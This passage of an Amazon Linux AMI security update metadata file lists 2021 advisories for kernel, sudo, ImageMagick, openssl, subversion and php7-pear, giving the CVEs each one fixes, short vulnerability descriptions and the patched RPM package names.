release="1.84.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.20" 
release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-plperl" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.20-1.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1477</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1477: important priority package update for kernel</title><issued date="2021-01-26 00:11:00" /><updated date="2021-01-26 19:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-29661:
A locking vulnerability was found in the tty subsystem of the Linux kernel in drivers/tty/tty_jobctrl.c. This flaw allows a local attacker to possibly corrupt memory or escalate privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1906525: CVE-2020-29661 kernel: locking issue in drivers/tty/tty_jobctrl.c can lead to a use-after-free
CVE-2020-29660:
A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID, aka CID-c8bcd9c5be24.
1906522: CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free
CVE-2020-29569:
99999:
CVE-2020-29568:
99999:
CVE-2020-27815:
No description is available for this CVE.
1897668: CVE-2020-27815 kernel: Array index out of bounds access when setting extended attributes on journaling filesystems.
CVE-2019-19816:
A flaw was found in the implementation of the BTRFS file system code in the Linux kernel. An attacker, who is able to mount a crafted BTRFS filesystem and perform common filesystem operations, can possibly cause an out-of-bounds write to memory. This could lead to memory corruption or privilege escalation.
1784923: CVE-2019-19816 kernel: out-of-bounds write in __btrfs_map_block in fs/btrfs/volumes.c
CVE-2019-19813:
In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image, performing some operations, and then making a syncfs system call can lead to a use-after-free in __mutex_lock in kernel/locking/mutex.c. This is related to mutex_can_spin_on_owner in kernel/locking/mutex.c, __btrfs_qgroup_free_meta in fs/btrfs/qgroup.c, and btrfs_insert_delayed_items in fs/btrfs/delayed-inode.c.
1784911: CVE-2019-19813 kernel: use-after-free in __mutex_lock in kernel/locking/mutex.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19813" title="" id="CVE-2019-19813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19816" title="" id="CVE-2019-19816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27815" title="" id="CVE-2020-27815" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29568" title="" id="CVE-2020-29568" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29569" title="" id="CVE-2020-29569" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29660" title="" id="CVE-2020-29660" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29661" title="" id="CVE-2020-29661" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.214" release="118.339.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.214-118.339.amzn1.i686.rpm</filename></package><package 
name="kernel" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.214-118.339.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1478</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1478: important priority package update for sudo</title><issued date="2021-01-26 00:11:00" /><updated date="2021-01-26 19:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3156:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3156" title="" id="CVE-2021-3156" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo" version="1.8.23" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.23-9.56.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.23-9.56.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.23-9.56.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.23-9.56.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.23-9.56.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.23" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.23-9.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1479</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1479: important priority package update for ImageMagick</title><issued date="2021-02-16 00:13:00" /><updated date="2021-02-16 22:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-29599:
A flaw was found in ImageMagick. The -authenticate option is mishandled, allowing a user-controlled password set for a PDF file to possibly inject additional shell commands via coders/pdf.c. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1907456: CVE-2020-29599 ImageMagick: Shell injection via PDF password could result in arbitrary code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29599" title="" id="CVE-2020-29599" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.68-3.23.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.68-3.23.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.68-3.23.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.68" release="3.23.amzn1" 
epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.68-3.23.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.68-3.23.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.68-3.23.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.68-3.23.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.68" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.68-3.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1480</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1480: important priority package update for kernel</title><issued date="2021-02-16 00:13:00" /><updated date="2024-05-23 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-1390:
A remote denial of service vulnerability was found in the Linux kernel's TIPC kernel module. The while loop in tipc_link_xmit() hits an unknown state while attempting to parse SKBs that are not in the queue. Sending two small UDP packets to a system with a UDP bearer causes the system's CPU utilization to instantly spike to 100%, causing a denial of service condition.
CVE-2021-39648:
In gadget_dev_desc_UDC_show of configfs.c, there is a possible disclosure of kernel heap memory due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-160822094. References: Upstream kernel
CVE-2021-3348:
A use-after-free flaw in the Linux kernel network block device (NBD) subsystem was found in the way a user calls the NBD_SET_SOCK ioctl at a certain point during device setup.
CVE-2021-3347:
A flaw was found in the Linux kernel. A use-after-free memory flaw in the Fast Userspace Mutexes functionality allows a local user to crash the system or escalate their privileges on the system. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-3178:
A flaw that leaks the file handle of the parent directory was found in the Linux kernel's NFS3 functionality, in the way a user calls READDIRPLUS. A local user could use this flaw to traverse to parts of the file system outside the mounted sub-folder.
CVE-2020-28374:
A flaw was found in the Linux kernel's implementation of the Linux SCSI target host, where an authenticated attacker could write to any block on the exported SCSI device backing store. This flaw allows an authenticated attacker to send LIO block requests to the Linux system to overwrite data on the backing store. The highest threat from this vulnerability is to integrity. In addition, this flaw affects the tcmu-runner package, where the affected SCSI command is called.
CVE-2020-27825:
A use-after-free flaw was found in kernel/trace/ring_buffer.c in the Linux kernel. A race between trace_open and a resize of the CPU buffer running in parallel on different CPUs may cause a denial of service (DoS). This flaw could even allow a local attacker with special user privilege to leak kernel information.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27825" title="" id="CVE-2020-27825" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28374" title="" id="CVE-2020-28374" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3178" title="" id="CVE-2021-3178" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3347" title="" id="CVE-2021-3347" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3348" title="" id="CVE-2021-3348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39648" title="" id="CVE-2021-39648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1390" title="" id="CVE-2023-1390" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.219" release="119.340.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.219" release="119.340.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.219-119.340.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.219" 
release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.219-119.340.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.219" release="119.340.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.219-119.340.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1481</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1481: medium priority package update for php7-pear</title><issued date="2021-02-16 00:13:00" /><updated date="2021-02-16 22:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-36193:
Tar.php in Archive_Tar through 1.4.11 allows write operations with Directory Traversal due to inadequate checking of symbolic links.
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36193" title="" id="CVE-2020-36193" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php7-pear" version="1.10.12" release="5.32.amzn1" epoch="1" arch="noarch"><filename>Packages/php7-pear-1.10.12-5.32.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1482</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1482: medium priority package update for openssl</title><issued date="2021-02-23 20:18:00" /><updated date="2021-02-24 19:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23841:
The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).
The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources.
1930310: CVE-2021-23841 openssl: NULL pointer dereference in X509_issuer_and_serial_hash()
CVE-2021-23840:
Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissible length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash.
Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissible length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).
1930324: CVE-2021-23840 openssl: integer overflow in CipherUpdate
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840" title="" id="CVE-2021-23840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841" title="" id="CVE-2021-23841" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.153.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.153.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.153.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.153.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.153.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.153.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.153.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.153.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.153.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.153.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" 
release="16.153.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.153.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1483</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1483: important priority package update for subversion</title><issued date="2021-02-23 20:18:00" /><updated date="2021-02-24 19:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-17525:
A null-pointer-dereference flaw was found in mod_authz_svn of subversion. This flaw allows a remote, unauthenticated attacker to cause a denial of service in some server configurations. The highest threat from this vulnerability is to system availability.
1922303: CVE-2020-17525 subversion: Remote unauthenticated denial of service in mod_authz_svn
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17525" title="" id="CVE-2020-17525" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-debuginfo" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.9.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.9.7-1.61.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.9.7" 